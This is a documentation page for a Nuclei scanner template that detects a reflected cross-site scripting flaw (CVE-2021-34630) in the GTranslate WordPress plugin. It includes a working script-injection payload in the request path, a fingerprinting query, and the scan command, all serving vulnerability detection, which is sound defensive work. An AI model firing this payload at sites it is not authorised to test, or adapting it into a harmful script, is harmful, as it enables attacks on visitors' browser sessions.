GTranslate < 2.8.65 - Cross-Site Scripting
ID: CVE-2021-34630
Severity: medium
Author: ritikchaddha
Tags: cve,cve2022,wordpress,wp,wp-plugin,gtranslate,xss
Description
Section titled “Description”In the Pro and Enterprise versions of GTranslate < 2.8.65, the gtranslate_request_uri_var function runs at the top of all pages and echoes out the contents of $_SERVER[‘REQUEST_URI’]. Although this uses addslashes, and most modern browsers automatically URLencode requests, this plugin is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below, or in cases where an attacker is able to modify the request en route between the client and the server, or in cases where the user is using an atypical browsing solution.
YAML Source
Section titled “YAML Source”id: CVE-2021-34630
info: name: GTranslate < 2.8.65 - Cross-Site Scripting author: ritikchaddha severity: medium description: | In the Pro and Enterprise versions of GTranslate < 2.8.65, the gtranslate_request_uri_var function runs at the top of all pages and echoes out the contents of $_SERVER['REQUEST_URI']. Although this uses addslashes, and most modern browsers automatically URLencode requests, this plugin is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below, or in cases where an attacker is able to modify the request en route between the client and the server, or in cases where the user is using an atypical browsing solution. impact: | Allows attackers to execute malicious scripts in the context of a user's browser session remediation: | Update GTranslate Plugin to the latest version to mitigate this issue. reference: - https://wpscan.com/vulnerability/dfac81bb-7807-4288-aee3-43c7653c6446/ - https://nvd.nist.gov/vuln/detail/CVE-2021-34630 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-34630 cwe-id: CWE-79 epss-score: 0.00095 epss-percentile: 0.39315 cpe: cpe:2.3:a:gtranslate:gtranslate:*:*:*:*:enterprise:wordpress:*:* metadata: verifiedl: true max-request: 1 vendor: gtranslate product: gtranslate framework: wordpress fofa-query: body="/wp-content/plugins/gtranslate" tags: cve,cve2022,wordpress,wp,wp-plugin,gtranslate,xss
http: - method: GET path: - "{{BaseURL}}/?page</script><script>alert(document.domain)</script>"
matchers-condition: and matchers: - type: word part: body words: - '</script><script>alert(document.domain)</script>' - 'gtranslate' condition: and
- type: word part: content_type words: - text/html
- type: status status: - 200# digest: 4a0a00473045022056322d873b9d8193798ad4fbed66199ffacb3ad58d01c9e0cfdfda581342cebd022100b7313495e2bc66d52826f92fa1c616975a8b2f99754c8769367eae91df9119a1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-34630.yaml"